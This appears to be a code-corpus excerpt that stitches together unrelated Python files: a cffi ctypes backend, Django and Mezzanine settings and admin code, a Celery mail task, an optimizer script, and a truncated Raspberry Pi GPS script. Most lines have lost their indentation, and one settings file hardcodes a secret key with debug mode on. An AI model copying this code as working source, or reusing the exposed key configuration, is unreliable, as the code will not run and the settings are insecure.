def load_library(self, path, flags=0):
cdll = ctypes.CDLL(path, flags)
return CTypesLibrary(self, cdll)
def new_void_type(self):
class CTypesVoid(CTypesData):
__slots__ = []
_reftypename = 'void &'
@staticmethod
def _from_ctypes(novalue):
return None
@staticmethod
def _to_ctypes(novalue):
if novalue is not None:
raise TypeError("None expected, got %s object" %
(type(novalue).__name__,))
return None
CTypesVoid._fix_class()
return CTypesVoid
def new_primitive_type(self, name):
if name == 'wchar_t':
raise NotImplementedError(name)
ctype = self.PRIMITIVE_TYPES[name]
if name == 'char':
kind = 'char'
elif name in ('float', 'double'):
kind = 'float'
else:
if name in ('signed char', 'unsigned char'):
kind = 'byte'
elif name == '_Bool':
kind = 'bool'
else:
kind = 'int'
is_signed = (ctype(-1).value == -1)
#
def _cast_source_to_int(source):
if isinstance(source, (int, long, float)):
source = int(source)
elif isinstance(source, CTypesData):
source = source._cast_to_integer()
elif isinstance(source, bytes):
source = ord(source)
elif source is None:
source = 0
else:
raise TypeError("bad type for cast to %r: %r" %
(CTypesPrimitive, type(source).__name__))
return source
#
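        # alias 'kind' so the class body below can re-export it as a class
        # attribute: 'kind = kind' inside the class would shadow the name
        # before it could be read from the enclosing function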
kind1 = kind
class CTypesPrimitive(CTypesGenericPrimitive):
__slots__ = ['_value']
_ctype = ctype
_reftypename = '%s &' % name
kind = kind1
def __init__(self, value):
self._value = value
@staticmethod
def _create_ctype_obj(init):
if init is None:
return ctype()
return ctype(CTypesPrimitive._to_ctypes(init))
if kind == 'int' or kind == 'byte':
@classmethod
def _cast_from(cls, source):
source = _cast_source_to_int(source)
source = ctype(source).value # cast within range
return cls(source)
def __int__(self):
return self._value
if kind == 'bool':
@classmethod
def _cast_from(cls, source):
if not isinstance(source, (int, long, float)):
source = _cast_source_to_int(source)
return cls(bool(source))
def __int__(self):
return self._value
if kind == 'char':
@classmethod
def _cast_from(cls, source):
source = _cast_source_to_int(source)
source = bytechr(source & 0xFF)
return cls(source)
def __int__(self):
return ord(self._value)
if kind == 'float':
@classmethod
def _cast_from(cls, source):
if isinstance(source, float):
pass
elif isinstance(source, CTypesGenericPrimitive):
if hasattr(source, '__float__'):
source = float(source)
else:
source = int(source)
else:
source = _cast_source_to_int(source)
source = ctype(source).value # fix precision
return cls(source)
def __int__(self):
return int(self._value)
def __float__(self):
return self._value
_cast_to_integer = __int__
if kind == 'int' or kind == 'byte' or kind == 'bool':
@staticmethod
def _to_ctypes(x):
if not isinstance(x, (int, long)):
if isinstance(x, CTypesData):
x = int(x)
else:
raise TypeError("integer expected, got %s" %
type(x).__name__)
if ctype(x).value != x:
if not is_signed and x < 0:
raise OverflowError("%s: negative integer" % name)
else:
raise OverflowError("%s: integer out of bounds"
% name)
return x
if kind == 'char':
@staticmethod
def _to_ctypes(x):
if isinstance(x, bytes) and len(x) == 1:
return x
if isinstance(x, CTypesPrimitive): # <CData <char>>
return x._value
raise TypeError("character expected, got %s" %
type(x).__name__)
def __nonzero__(self):
return ord(self._value) != 0
else:
def __nonzero__(self):
return self._value != 0
__bool__ = __nonzero__
if kind == 'float':
@staticmethod
def _to_ctypes(x):
if not isinstance(x, (int, long, float, CTypesData)):
raise TypeError("float expected, got %s" %
type(x).__name__)
return ctype(x).value
@staticmethod
def _from_ctypes(value):
return getattr(value, 'value', value)
@staticmethod
def _initialize(blob, init):
blob.value = CTypesPrimitive._to_ctypes(init)
if kind == 'char':
def _to_string(self, maxlen):
return self._value
if kind == 'byte':
def _to_string(self, maxlen):
return chr(self._value & 0xff)
#
CTypesPrimitive._fix_class()
return CTypesPrimitive
def new_pointer_type(self, BItem):
getbtype = self.ffi._get_cached_btype
if BItem is getbtype(model.PrimitiveType('char')):
kind = 'charp'
elif BItem in (getbtype(model.PrimitiveType('signed char')),
getbtype(model.PrimitiveType('unsigned char'))):
kind = 'bytep'
elif BItem is getbtype(model.void_type):
kind = 'voidp'
else:
kind = 'generic'
#
class CTypesPtr(CTypesGenericPtr):
__slots__ = ['_own']
if kind == 'charp':
__slots__ += ['__as_strbuf']
_BItem = BItem
if hasattr(BItem, '_ctype'):
_ctype = ctypes.POINTER(BItem._ctype)
_bitem_size = ctypes.sizeof(BItem._ctype)
else:
_ctype = ctypes.c_void_p
if issubclass(BItem, CTypesGenericArray):
_reftypename = BItem._get_c_name('(* &)')
else:
_reftypename = BItem._get_c_name(' * &')
def __init__(self, init):
ctypeobj = BItem._create_ctype_obj(init)
if kind == 'charp':
self.__as_strbuf = ctypes.create_string_buffer(
ctypeobj.value + b'\x00')
self._as_ctype_ptr = ctypes.cast(
self.__as_strbuf, self._ctype)
else:
self._as_ctype_ptr = ctypes.pointer(ctypeobj)
self._address = ctypes.cast(self._as_ctype_ptr,
ctypes.c_void_p).value
self._own = True
def __add__(self, other):
if isinstance(other, (int, long)):
return self._new_pointer_at(self._address +
other * self._bitem_size)
else:
return NotImplemented
def __sub__(self, other):
if isinstance(other, (int, long)):
return self._new_pointer_at(self._address -
other * self._bitem_size)
elif type(self) is type(other):
return (self._address - other._address) // self._bitem_size
else:
return NotImplemented
def __getitem__(self, index):
if getattr(self, '_own', False) and index != 0:
raise IndexError
return BItem._from_ctypes(self._as_ctype_ptr[index])
def __setitem__(self, index, value):
self._as_ctype_ptr[index] = BItem._to_ctypes(value)
if kind == 'charp' or kind == 'voidp':
@classmethod
def _arg_to_ctypes(cls, *value):
if value and isinstance(value[0], bytes):
return ctypes.c_char_p(value[0])
else:
return super(CTypesPtr, cls)._arg_to_ctypes(*value)
if kind == 'charp' or kind == 'bytep':
def _to_string(self, maxlen):
if maxlen < 0:
maxlen = sys.maxsize
p = ctypes.cast(self._as_ctype_ptr,
ctypes.POINTER(ctypes.c_char))
n = 0
while n < maxlen and p[n] != b'\x00':
n += 1
return b''.join([p[i] for i in range(n)])
def _get_own_repr(self):
if getattr(self, '_own', False):
return 'owning %d bytes' % (
ctypes.sizeof(self._as_ctype_ptr.contents),)
return super(CTypesPtr, self)._get_own_repr()
#
if (BItem is self.ffi._get_cached_btype(model.void_type) or
BItem is self.ffi._get_cached_btype(model.PrimitiveType('char'))):
CTypesPtr._automatic_casts = True
#
CTypesPtr._fix_class()
return CTypesPtr
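    # Arrays reuse the pointer class for arithmetic; length may be None for
    # open-ended types such as "int[]", in which case the length is taken
    # from the initializer at construction time.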
def new_array_type(self, CTypesPtr, length):
if length is None:
brackets = ' &[]'
else:
brackets = ' &[%d]' % length
BItem = CTypesPtr._BItem
getbtype = self.ffi._get_cached_btype
if BItem is getbtype(model.PrimitiveType('char')):
kind = 'char'
elif BItem in (getbtype(model.PrimitiveType('signed char')),
getbtype(model.PrimitiveType('unsigned char'))):
kind = 'byte'
else:
kind = 'generic'
#
class CTypesArray(CTypesGenericArray):
__slots__ = ['_blob', '_own']
if length is not None:
_ctype = BItem._ctype * length
else:
__slots__.append('_ctype')
_reftypename = BItem._get_c_name(brackets)
_declared_length = length
_CTPtr = CTypesPtr
def __init__(self, init):
if length is None:
if isinstance(init, (int, long)):
len1 = init
init = None
elif kind == 'char' and isinstance(init, bytes):
len1 = len(init) + 1 # extra null
else:
init = tuple(init)
len1 = len(init)
self._ctype = BItem._ctype * len1
self._blob = self._ctype()
self._own = True
if init is not None:
self._initialize(self._blob, init)
@staticmethod
def _initialize(blob, init):
if isinstance(init, bytes):
init = [init[i:i+1] for i in range(len(init))]
else:
init = tuple(init)
if len(init) > len(blob):
raise IndexError("too many initializers")
addr = ctypes.cast(blob, ctypes.c_void_p).value
PTR = ctypes.POINTER(BItem._ctype)
itemsize = ctypes.sizeof(BItem._ctype)
for i, value in enumerate(init):
p = ctypes.cast(addr + i * itemsize, PTR)
BItem._initialize(p.contents, value)
def __len__(self):
return len(self._blob)
def __getitem__(self, index):
if not (0 <= index < len(self._blob)):
raise IndexError
return BItem._from_ctypes(self._blob[index])
def __setitem__(self, index, value):
if not (0 <= index < len(self._blob)):
raise IndexError
self._blob[index] = BItem._to_ctypes(value)
if kind == 'char' or kind == 'byte':
def _to_string(self, maxlen):
if maxlen < 0:
maxlen = len(self._blob)
p = ctypes.cast(self._blob,
ctypes.POINTER(ctypes.c_char))
n = 0
while n < maxlen and p[n] != b'\x00':
n += 1
return b''.join([p[i] for i in range(n)])
def _get_own_repr(self):
if getattr(self, '_own', False):
return 'owning %d bytes' % (ctypes.sizeof(self._blob),)
return super(CTypesArray, self)._get_own_repr()
def _convert_to_address(self, BClass):
if BClass in (CTypesPtr, None) or BClass._automatic_casts:
return ctypes.addressof(self._blob)
else:
return CTypesData._convert_to_address(self, BClass)
@staticmethod
def _from_ctypes(ctypes_array):
self = CTypesArray.__new__(CTypesArray)
self._blob = ctypes_array
return self
@staticmethod
def _arg_to_ctypes(value):
return CTypesPtr._arg_to_ctypes(value)
def __add__(self, other):
if isinstance(other, (int, long)):
return CTypesPtr._new_pointer_at(
ctypes.addressof(self._blob) +
other * ctypes.sizeof(BItem._ctype))
else:
return NotImplemented
@classmethod
def _cast_from(cls, source):
raise NotImplementedError("casting to %r" % (
cls._get_c_name(),))
#
CTypesArray._fix_class()
return CTypesArray
def _new_struct_or_union(self, kind, name, base_ctypes_class):
#
class struct_or_union(base_ctypes_class):
pass
struct_or_union.__name__ = '%s_%s' % (kind, name)
kind1 = kind
#
class CTypesStructOrUnion(CTypesBaseStructOrUnion):
__slots__ = ['_blob']
_ctype = struct_or_union
_reftypename = '%s &' % (name,)
_kind = kind = kind1
#
CTypesStructOrUnion._fix_class()
return CTypesStructOrUnion
def new_struct_type(self, name):
return self._new_struct_or_union('struct', name, ctypes.Structure)
def new_union_type(self, name):
return self._new_struct_or_union('union', name, ctypes.Union)
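    # Fill in a struct/union created above: build the ctypes _fields_ list and
    # attach Python properties so that both the struct cdata and pointers to
    # it expose the fields by name.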
def complete_struct_or_union(self, CTypesStructOrUnion, fields, tp,
totalsize=-1, totalalignment=-1, sflags=0):
if totalsize >= 0 or totalalignment >= 0:
raise NotImplementedError("the ctypes backend of CFFI does not support "
"structures completed by verify(); please "
"compile and install the _cffi_backend module.")
struct_or_union = CTypesStructOrUnion._ctype
fnames = [fname for (fname, BField, bitsize) in fields]
btypes = [BField for (fname, BField, bitsize) in fields]
bitfields = [bitsize for (fname, BField, bitsize) in fields]
#
bfield_types = {}
cfields = []
for (fname, BField, bitsize) in fields:
if bitsize < 0:
cfields.append((fname, BField._ctype))
bfield_types[fname] = BField
else:
cfields.append((fname, BField._ctype, bitsize))
bfield_types[fname] = Ellipsis
if sflags & 8:
struct_or_union._pack_ = 1
struct_or_union._fields_ = cfields
CTypesStructOrUnion._bfield_types = bfield_types
#
@staticmethod
def _create_ctype_obj(init):
result = struct_or_union()
if init is not None:
initialize(result, init)
return result
CTypesStructOrUnion._create_ctype_obj = _create_ctype_obj
#
def initialize(blob, init):
if is_union:
if len(init) > 1:
raise ValueError("union initializer: %d items given, but "
"only one supported (use a dict if needed)"
% (len(init),))
if not isinstance(init, dict):
if isinstance(init, (bytes, unicode)):
raise TypeError("union initializer: got a str")
init = tuple(init)
if len(init) > len(fnames):
raise ValueError("too many values for %s initializer" %
CTypesStructOrUnion._get_c_name())
init = dict(zip(fnames, init))
addr = ctypes.addressof(blob)
for fname, value in init.items():
BField, bitsize = name2fieldtype[fname]
assert bitsize < 0, \
"not implemented: initializer with bit fields"
offset = CTypesStructOrUnion._offsetof(fname)
PTR = ctypes.POINTER(BField._ctype)
p = ctypes.cast(addr + offset, PTR)
BField._initialize(p.contents, value)
is_union = CTypesStructOrUnion._kind == 'union'
name2fieldtype = dict(zip(fnames, zip(btypes, bitfields)))
#
for fname, BField, bitsize in fields:
if fname == '':
raise NotImplementedError("nested anonymous structs/unions")
if hasattr(CTypesStructOrUnion, fname):
raise ValueError("the field name %r conflicts in "
"the ctypes backend" % fname)
if bitsize < 0:
def getter(self, fname=fname, BField=BField,
offset=CTypesStructOrUnion._offsetof(fname),
PTR=ctypes.POINTER(BField._ctype)):
addr = ctypes.addressof(self._blob)
p = ctypes.cast(addr + offset, PTR)
return BField._from_ctypes(p.contents)
def setter(self, value, fname=fname, BField=BField):
setattr(self._blob, fname, BField._to_ctypes(value))
#
if issubclass(BField, CTypesGenericArray):
setter = None
if BField._declared_length == 0:
def getter(self, fname=fname, BFieldPtr=BField._CTPtr,
offset=CTypesStructOrUnion._offsetof(fname),
PTR=ctypes.POINTER(BField._ctype)):
addr = ctypes.addressof(self._blob)
p = ctypes.cast(addr + offset, PTR)
return BFieldPtr._from_ctypes(p)
#
else:
def getter(self, fname=fname, BField=BField):
return BField._from_ctypes(getattr(self._blob, fname))
def setter(self, value, fname=fname, BField=BField):
# xxx obscure workaround
value = BField._to_ctypes(value)
oldvalue = getattr(self._blob, fname)
setattr(self._blob, fname, value)
if value != getattr(self._blob, fname):
setattr(self._blob, fname, oldvalue)
raise OverflowError("value too large for bitfield")
setattr(CTypesStructOrUnion, fname, property(getter, setter))
#
CTypesPtr = self.ffi._get_cached_btype(model.PointerType(tp))
for fname in fnames:
if hasattr(CTypesPtr, fname):
raise ValueError("the field name %r conflicts in "
"the ctypes backend" % fname)
def getter(self, fname=fname):
return getattr(self[0], fname)
def setter(self, value, fname=fname):
setattr(self[0], fname, value)
setattr(CTypesPtr, fname, property(getter, setter))
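    # Function pointers: calls go through ctypes.CFUNCTYPE; constructing one
    # from a Python callable wraps it in a callback that converts arguments
    # and the result between cdata objects and raw ctypes values.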
def new_function_type(self, BArgs, BResult, has_varargs):
nameargs = [BArg._get_c_name() for BArg in BArgs]
if has_varargs:
nameargs.append('...')
nameargs = ', '.join(nameargs)
#
class CTypesFunctionPtr(CTypesGenericPtr):
__slots__ = ['_own_callback', '_name']
_ctype = ctypes.CFUNCTYPE(getattr(BResult, '_ctype', None),
*[BArg._ctype for BArg in BArgs],
use_errno=True)
_reftypename = BResult._get_c_name('(* &)(%s)' % (nameargs,))
def __init__(self, init, error=None):
# create a callback to the Python callable init()
import traceback
assert not has_varargs, "varargs not supported for callbacks"
if getattr(BResult, '_ctype', None) is not None:
error = BResult._from_ctypes(
BResult._create_ctype_obj(error))
else:
error = None
def callback(*args):
args2 = []
for arg, BArg in zip(args, BArgs):
args2.append(BArg._from_ctypes(arg))
try:
res2 = init(*args2)
res2 = BResult._to_ctypes(res2)
except:
traceback.print_exc()
res2 = error
if issubclass(BResult, CTypesGenericPtr):
if res2:
res2 = ctypes.cast(res2, ctypes.c_void_p).value
# .value: http://bugs.python.org/issue1574593
else:
res2 = None
#print repr(res2)
return res2
if issubclass(BResult, CTypesGenericPtr):
# The only pointers callbacks can return are void*s:
# http://bugs.python.org/issue5710
callback_ctype = ctypes.CFUNCTYPE(
ctypes.c_void_p,
*[BArg._ctype for BArg in BArgs],
use_errno=True)
else:
callback_ctype = CTypesFunctionPtr._ctype
self._as_ctype_ptr = callback_ctype(callback)
self._address = ctypes.cast(self._as_ctype_ptr,
ctypes.c_void_p).value
self._own_callback = init
@staticmethod
def _initialize(ctypes_ptr, value):
if value:
raise NotImplementedError("ctypes backend: not supported: "
"initializers for function pointers")
def __repr__(self):
c_name = getattr(self, '_name', None)
if c_name:
i = self._reftypename.index('(* &)')
if self._reftypename[i-1] not in ' )*':
c_name = ' ' + c_name
c_name = self._reftypename.replace('(* &)', c_name)
return CTypesData.__repr__(self, c_name)
def _get_own_repr(self):
if getattr(self, '_own_callback', None) is not None:
return 'calling %r' % (self._own_callback,)
return super(CTypesFunctionPtr, self)._get_own_repr()
def __call__(self, *args):
if has_varargs:
assert len(args) >= len(BArgs)
extraargs = args[len(BArgs):]
args = args[:len(BArgs)]
else:
assert len(args) == len(BArgs)
ctypes_args = []
for arg, BArg in zip(args, BArgs):
ctypes_args.append(BArg._arg_to_ctypes(arg))
if has_varargs:
for i, arg in enumerate(extraargs):
if arg is None:
ctypes_args.append(ctypes.c_void_p(0)) # NULL
continue
if not isinstance(arg, CTypesData):
raise TypeError(
"argument %d passed in the variadic part "
"needs to be a cdata object (got %s)" %
(1 + len(BArgs) + i, type(arg).__name__))
ctypes_args.append(arg._arg_to_ctypes(arg))
result = self._as_ctype_ptr(*ctypes_args)
return BResult._from_ctypes(result)
#
CTypesFunctionPtr._fix_class()
return CTypesFunctionPtr
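    # Enums are just the underlying integer type plus a reverse value-to-name
    # mapping used for repr and string conversion.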
def new_enum_type(self, name, enumerators, enumvalues, CTypesInt):
assert isinstance(name, str)
reverse_mapping = dict(zip(reversed(enumvalues),
reversed(enumerators)))
#
class CTypesEnum(CTypesInt):
__slots__ = []
_reftypename = '%s &' % name
def _get_own_repr(self):
value = self._value
try:
return '%d: %s' % (value, reverse_mapping[value])
except KeyError:
return str(value)
def _to_string(self, maxlen):
value = self._value
try:
return reverse_mapping[value]
except KeyError:
return str(value)
#
CTypesEnum._fix_class()
return CTypesEnum
def get_errno(self):
return ctypes.get_errno()
def set_errno(self, value):
ctypes.set_errno(value)
def string(self, b, maxlen=-1):
return b._to_string(maxlen)
def buffer(self, bptr, size=-1):
raise NotImplementedError("buffer() with ctypes backend")
def sizeof(self, cdata_or_BType):
if isinstance(cdata_or_BType, CTypesData):
return cdata_or_BType._get_size_of_instance()
else:
assert issubclass(cdata_or_BType, CTypesData)
return cdata_or_BType._get_size()
def alignof(self, BType):
assert issubclass(BType, CTypesData)
return BType._alignment()
def newp(self, BType, source):
if not issubclass(BType, CTypesData):
raise TypeError
return BType._newp(source)
def cast(self, BType, source):
return BType._cast_from(source)
def callback(self, BType, source, error, onerror):
assert onerror is None # XXX not implemented
return BType(source, error)
_weakref_cache_ref = None
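    # Emulate ffi.gc(): keep a weak reference to a fresh cast of the cdata and
    # run the destructor on the original when that copy is garbage-collected.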
def gcp(self, cdata, destructor, size=0):
if self._weakref_cache_ref is None:
import weakref
class MyRef(weakref.ref):
def __eq__(self, other):
myref = self()
return self is other or (
myref is not None and myref is other())
def __ne__(self, other):
return not (self == other)
def __hash__(self):
try:
return self._hash
except AttributeError:
self._hash = hash(self())
return self._hash
self._weakref_cache_ref = {}, MyRef
weak_cache, MyRef = self._weakref_cache_ref
if destructor is None:
try:
del weak_cache[MyRef(cdata)]
except KeyError:
raise TypeError("Can remove destructor only on a object "
"previously returned by ffi.gc()")
return None
def remove(k):
cdata, destructor = weak_cache.pop(k, (None, None))
if destructor is not None:
destructor(cdata)
new_cdata = self.cast(self.typeof(cdata), cdata)
assert new_cdata is not cdata
weak_cache[MyRef(new_cdata, remove)] = (cdata, destructor)
return new_cdata
typeof = type
def getcname(self, BType, replace_with):
return BType._get_c_name(replace_with)
def typeoffsetof(self, BType, fieldname, num=0):
if isinstance(fieldname, str):
if num == 0 and issubclass(BType, CTypesGenericPtr):
BType = BType._BItem
if not issubclass(BType, CTypesBaseStructOrUnion):
raise TypeError("expected a struct or union ctype")
BField = BType._bfield_types[fieldname]
if BField is Ellipsis:
raise TypeError("not supported for bitfields")
return (BField, BType._offsetof(fieldname))
elif isinstance(fieldname, (int, long)):
if issubclass(BType, CTypesGenericArray):
BType = BType._CTPtr
if not issubclass(BType, CTypesGenericPtr):
raise TypeError("expected an array or ptr ctype")
BItem = BType._BItem
offset = BItem._get_size() * fieldname
if offset > sys.maxsize:
raise OverflowError
return (BItem, offset)
else:
raise TypeError(type(fieldname))
def rawaddressof(self, BTypePtr, cdata, offset=None):
if isinstance(cdata, CTypesBaseStructOrUnion):
ptr = ctypes.pointer(type(cdata)._to_ctypes(cdata))
elif isinstance(cdata, CTypesGenericPtr):
if offset is None or not issubclass(type(cdata)._BItem,
CTypesBaseStructOrUnion):
raise TypeError("unexpected cdata type")
ptr = type(cdata)._to_ctypes(cdata)
elif isinstance(cdata, CTypesGenericArray):
ptr = type(cdata)._to_ctypes(cdata)
else:
raise TypeError("expected a <cdata 'struct-or-union'>")
if offset:
ptr = ctypes.cast(
ctypes.c_void_p(
ctypes.cast(ptr, ctypes.c_void_p).value + offset),
type(ptr))
return BTypePtr._from_ctypes(ptr)
class CTypesLibrary(object):
def __init__(self, backend, cdll):
self.backend = backend
self.cdll = cdll
def load_function(self, BType, name):
c_func = getattr(self.cdll, name)
funcobj = BType._from_ctypes(c_func)
funcobj._name = name
return funcobj
def read_variable(self, BType, name):
try:
ctypes_obj = BType._ctype.in_dll(self.cdll, name)
except AttributeError as e:
raise NotImplementedError(e)
return BType._from_ctypes(ctypes_obj)
def write_variable(self, BType, name, value):
new_ctypes_obj = BType._to_ctypes(value)
ctypes_obj = BType._ctype.in_dll(self.cdll, name)
ctypes.memmove(ctypes.addressof(ctypes_obj),
ctypes.addressof(new_ctypes_obj),
ctypes.sizeof(BType._ctype))
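
# A minimal, hedged usage sketch (not part of the original module): the classes
# above are normally reached through cffi's FFI facade by passing the backend
# in explicitly. It assumes a cffi installation whose FFI() accepts a backend
# argument and whose backend_ctypes module exposes a CTypesBackend entry point.
def _ctypes_backend_demo():
    from cffi import FFI
    from cffi.backend_ctypes import CTypesBackend
    ffi = FFI(backend=CTypesBackend())
    buf = ffi.new("char[]", b"hello")   # a CTypesArray with a trailing NUL byte
    assert ffi.string(buf) == b"hello"  # dispatches to CTypesArray._to_string()
    assert ffi.sizeof(buf) == 6         # five bytes plus the terminator
    return buf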
| Widiot/simpleblog | venv/lib/python3.5/site-packages/cffi/backend_ctypes.py | Python | mit | 42,086 | 0.001022 |
from __future__ import unicode_literals
from django.contrib import admin
from django.core import urlresolvers
from mezzanine.core.admin import TabularDynamicInlineAdmin, StackedDynamicInlineAdmin
from .models import Slider, SlideCaption, Slide
class SlideInline(TabularDynamicInlineAdmin):
template = "slider_revolution/admin/slide_dynamic_inline_tabular.html"
model = Slide
extra = 1
def changeform_link(self, instance):
if instance.id:
changeform_url = urlresolvers.reverse('admin:slider_revolution_slide_change', args=(instance.id,))
return '<a href="{}">Details</a>'.format(changeform_url)
else:
addform_url = urlresolvers.reverse('admin:slider_revolution_slide_add')
return '<a href="{}">Add</a>'.format(addform_url)
return u''
changeform_link.allow_tags = True
changeform_link.short_description = 'Slide'
fields = ("image_thumb", "changeform_link")
readonly_fields = ("image_thumb", "changeform_link",)
class SliderAdmin(admin.ModelAdmin):
inlines = (SlideInline,)
class SlideCaptionInline(StackedDynamicInlineAdmin):
model = SlideCaption
class SlideAdmin(admin.ModelAdmin):
inlines = (SlideCaptionInline,)
admin.site.register(Slider, SliderAdmin)
admin.site.register(Slide, SlideAdmin)
| restless/mezzanine-slider-revolution | slider_revolution/admin.py | Python | mit | 1,323 | 0.002268 |
"""
Django settings for ltc_huobi project.
Generated by 'django-admin startproject' using Django 1.11.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
import ltc
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '6t$e^bg18g6u)((0gvfb(dnfh5y&=0_lz&5*-6hrs=mc&u1j#t'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['localhost']
# Application definition
INSTALLED_APPS = [
'ltc.apps.LtcConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'ltc_huobi.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'ltc_huobi.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
PROJECT_ROOT = os.path.normpath(os.path.dirname(__file__))
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'static')
STATIC_URL = '/static/'
| yiplee/ltc-huobi | ltc_huobi/settings.py | Python | mit | 3,262 | 0.001226 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from flask import render_template
from app.extensions import celery, mail
from app.data import db
from celery.signals import task_postrun
from flask_mail import Message
@celery.task
def send_registration_email(user, token):
msg = Message(
'User Registration',
sender='admin@flask-bones.com',
recipients=[user.email]
)
msg.body = render_template(
'mail/registration.mail',
user=user,
token=token
)
mail.send(msg)
@task_postrun.connect
def close_session(*args, **kwargs):
    # Flask-SQLAlchemy automatically creates new sessions for you from a
    # scoped session factory. Since we keep the same app context, removing
    # the session here ensures each task gets a fresh one (e.g. session
    # errors won't propagate across tasks).
db.session.remove()
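
# Hedged usage sketch (not part of the original file): a task decorated with
# @celery.task is normally queued from a request handler via .delay(), which
# is standard Celery API; the register_user() name and its arguments are
# illustrative assumptions, not part of this app.
def register_user(user, token):
    # enqueue the mail for a worker instead of sending it during the request
    send_registration_email.delay(user, token)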
| Urumasi/Flask-Bones | app/tasks.py | Python | mit | 874 | 0 |
from implementation import *
from implementations import *
| drvinceknight/sklDj | sklDj/implementations/__init__.py | Python | mit | 59 | 0 |
import sys
import argparse
import time
sys.path.append('./bin/moabc')
import optimizer
# Handle command-line arguments
# Initialize the parser
parser = argparse.ArgumentParser(description='This script optimizes bayesian network graph structure by MOABC')
# Grinding success-rate table
parser.add_argument("infile_pt", type=str)
# Cost of a single grind attempt
parser.add_argument("-pg","--pricegrind", type=int)
# Number of runs of the grinding simulator
parser.add_argument("-na","--num_average", type=int, default=100)
# Output destination for the results
# No trailing slash at the end:
# OK: test, ./test
# NG (bad): test/, ./test/
parser.add_argument("out_dir", type=str)
# Save intermediate results during learning
group_sp = parser.add_mutually_exclusive_group()
group_sp.add_argument('-sp', '--saveprogress', action='store_true')
group_sp.add_argument('-n-sp', '--no-saveprogress', action='store_false')
parser.set_defaults(saveprogress=False)
# Number of processes for parallelization
parser.add_argument("-np","--num_proc", type=int, default=1)
# Whether to output images
# Not possible over e.g. an SSH login, so pass False there
group_wi = parser.add_mutually_exclusive_group()
group_wi.add_argument('-wi', '--withimage', action='store_true')
group_wi.add_argument('-n-wi', '--no-with_image', action='store_false')
parser.set_defaults(withimage=True)
# Numbers of bees
parser.add_argument('-me', '--m_employed', type=int, help='number of employed bees', default=40)
parser.add_argument('-mo', '--m_onlooker',type=int, help='number of onlooker bees', default=40)
parser.add_argument('-li', '--limit',type=int, help='scout-bee trigger threshold', default=3)
# Number of iterations
parser.add_argument('-n', type=int, help='number of iterations', default=50)
#ALPHA
parser.add_argument('-a', '--alpha', type=float, help='value of ALPHA', default=1)
# Parse the arguments
# vars() below apparently turns the parsed namespace into a dict
args = vars(parser.parse_args())
print("parsed argments from argparse\n%s\n" % str(args))
# Output directory
out_dir = args['out_dir']
# Whether to save intermediate results while running
save_progress = args['saveprogress']
# Create the optimizer instance
infile_pt = args['infile_pt']
input_price_grind = args['pricegrind']
op = optimizer.MOABC(infile_pt, input_price_grind)
# Set the hyperparameters
op.M_employed = args['m_employed']
op.M_onlooker = args['m_onlooker']
op.LIMIT = args['limit']
op.N = args['n']
op.weight_h = args['alpha']
op.proc = args['num_proc']
op.num_average = args['num_average']
# Apply the parameters
op.gen.calculate_weights()
# Run the learning process
dir_save_progress = ''
if save_progress:
dir_save_progress = out_dir
start = time.time()
op.learn(out_dirname=dir_save_progress)
end = time.time()
# Output the elapsed time
str_time = "time: ", "{0}".format(end - start)
print(str_time)
f = open('%s/time.log' % out_dir, 'w')
f.writelines(str_time)
f.close()
# Output the learning results
op.save_result(out_dir, prefix='total', with_image=args['withimage'])
| curiburn/pso2_grind_optimizer | py/main.py | Python | gpl-3.0 | 2,887 | 0.011304 |
#!/usr/bin/python
import serial
import RPi.GPIO as GPIO
import time
import math
from RPIO import PWM
import logging
from math import *
from hmc5883l import hmc5883l
import sys
import os
# -----------------------------------------
# ----- begin declare variables
# -----------------------------------------
# log filename
logfile = 'log.csv'
# waypoint filename
wpfile = "waypoints.txt"
# GPS serial port
serialport = serial.Serial("/dev/gps0", 115200)
# xbee serial port
#xbee = serial.Serial("/dev/gps0", 9600)
# compass adjustment
cAdjust = +2
# GPIO pins
goButton = 17
readyLED = 18
steering = 24
#throttle = 23
# GPS accuracy * 2
GPSaccuracy = 10
# -----------------------------------------
# ----- end declare variables
# -----------------------------------------
GPIO.setmode(GPIO.BCM)
GPIO.setup(readyLED,GPIO.OUT)
GPIO.setup(goButton,GPIO.IN)
# setup compass
#mydec = -13,25
